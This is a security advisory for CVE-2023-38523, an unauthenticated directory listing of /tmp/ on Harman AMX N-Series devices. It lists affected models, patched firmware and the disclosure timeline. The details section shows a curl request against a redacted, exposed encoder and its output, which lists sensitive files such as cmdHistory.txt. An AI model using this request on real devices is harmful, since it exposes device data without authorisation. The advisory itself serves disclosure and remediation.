CVE-2023-38523
CVE-2023-38523
Summary
The web interface for multiple Harman AMX N-Series devices are vulnerable to directory listing on the /tmp/ directory, without authentication.
Models Impacted
N-Series N1115 Wallplate Video Encoder
N-Series N1x22A Video Encoder/Decoder
N-Series N1x33A Video Encoder/Decoder
N-Series N1x33 Video Encoder/Decoder
N-Series N2x35 Video Encoder/Decoder
N-Series N2x35A Video Encoder/Decoder
N-Series N2xx2 Video Encoder/Decoder
N-Series N2xx2A Video Encoder/Decoder
N-Series N3000 Video Encoder/Decoder
N-Series N4321 Audio Transceiver
Vulnerability Details
The /tmp/ directory can be accessed on the AMX N-Series 2000/3000 Encoders without authentication. The files included in this directory include sensitive data such as the command history and screenshot of the file being processed.
As an example, the following is redacted snippet from an encoder that is currently exposed to the Internet :
$ curl http://[REDACTED]/tmp/ -i
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 1848
Date: Fri, 07 Jun 2013 03:10:44 GMT
Server: lighttpd/1.4.28
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Index of /tmp/</title>
<style type="text/css">
a, a:active {text-decoration: none; color: blue;}
a:visited {color: #48468F;}
a:hover, a:focus {text-decoration: underline; color: red;}
body {background-color: #F5F5F5;}
h2 {margin-bottom: 12px;}
table {margin-left: 12px;}
th, td { font: 90% monospace; text-align: left;}
th { font-weight: bold; padding-right: 14px; padding-bottom: 3px;}
td {padding-right: 14px;}
td.s, th.s {text-align: right;}
div.list { background-color: white; border-top: 1px solid #646464; border-bottom: 1px solid #646464; padding-top: 10px; padding-bottom: 14px;}
div.foot { font: 90% monospace; color: #787878; padding-top: 4px;}
</style>
</head>
<body>
<h2>Index of /tmp/</h2>
<div class="list">
<table summary="Directory Listing" cellpadding="0" cellspacing="0">
<thead><tr><th class="n">Name</th><th class="m">Last Modified</th><th class="s">Size</th><th class="t">Type</th></tr></thead>
<tbody>
<tr><td class="n"><a href="../">Parent Directory</a>/</td><td class="m"> </td><td class="s">- </td><td class="t">Directory</td></tr>
<tr><td class="n"><a href="cmdHistory.txt">cmdHistory.txt</a></td><td class="m">2013-Mar-24 11:49:25</td><td class="s">14.4K</td><td class="t">text/plain</td></tr>
<tr><td class="n"><a href="edidDecoder.txt">edidDecoder.txt</a></td><td class="m">2013-Jan-25 05:13:57</td><td class="s">3.2K</td><td class="t">text/plain</td></tr>
<tr><td class="n"><a href="switch.xml">switch.xml</a></td><td class="m">2012-Aug-08 08:08:26</td><td class="s">13.7K</td><td class="t">application/xml</td></tr>
</tbody>
</table>
</div>
<div class="foot">lighttpd/1.4.28</div>
</body>
</html>
An example of a vulnerable host :
Recommended Mitigations
The following updates and hotfixes were released to help remediate the issue :
https://help.harmanpro.com/n1115-svsi-firmware
https://help.harmanpro.com/n1x22a-updater
https://help.harmanpro.com/n1x33a-updater
https://help.harmanpro.com/n1x33-updater
https://help.harmanpro.com/n2x35-updater-hotfix
https://help.harmanpro.com/n2x35a-updater-hotfix
https://help.harmanpro.com/n2xx2-updater-hotfix
https://help.harmanpro.com/n2xx2a-updater
https://help.harmanpro.com/svsi-n4321-firmware
https://help.harmanpro.com/n3k-updater-hotfix
Patched Versions
N-Series N1115 Wallplate Video Encoder v1.15.61
N-Series N1x22A Video Encoder/Decoder v1.15.61
N-Series N1x33A Video Encoder/Decoder v1.15.61
N-Series N1x33 Video Encoder/Decoder v1.15.61
N-Series N2x35 Video Encoder/Decoder v1.15.61
N-Series N2x35A Video Encoder/Decoder v1.15.61
N-Series N2xx2 Video Encoder/Decoder v1.15.61
N-Series N2xx2A Video Encoder/Decoder v1.15.61
N-Series N3000 Video Encoder/Decoder v2.12.105
N-Series N4321 Audio Transceiver v1.00.06
Disclosure Timeline
Dec 12,2022 | Two attempts made to reach out to Harman on their Product Security web form. |
Dec 22, 2022 | Email sent to security@samsung.com. |
Jan 8, 2023 | Email sent to privacy@harman.com and security@harman.com. |
Jan 8, 2023 | Response from Privacy@harman.com to reach out to cybersecurity@harman.com for reporting vulnerabilities. |
Jan 8, 2023 | Emailed cybersecurity@harman.com to confirm right channel to report the vulnerability. |
Jan 10, 2023 | Provided Harman with a detailed report of the Vulnerability. |
Jan 11, 2023 | Report acknowledged by Harman Cybersecurity. |
Mar 3, 2023 | Checked in with Harman Cybersecurity. |
Mar 6, 2023 | Harman Cybersecurity confirmed that patches have already been published and the issue can be publicly disclosed. |
Mar 8, 2023 | CVE requested from MITRE (First Attempt). |
Apr 27, 2023 | MITRE referred to Samsung Mobile as CNA. |
May 12, 2023 | CVE requested from Samsung Mobile (CNA). |
May 15, 2023 | Samsung Mobile states issue is out of scope for their CNA. |
May 15, 2023 | CVE requested from MITRE (Second Attempt). Request was marked as Closed without a response. |
Jun 28, 2023 | CVE requested from MITRE (Third attempt). |
Jul 19,2023 | CVE number assigned by MITRE. |
Special Thanks to the Cybersecurity team at Harman for their prompt responses (after the initial hiccup in reaching them) and their detailed communication on steps taken to remediate the vulnerability.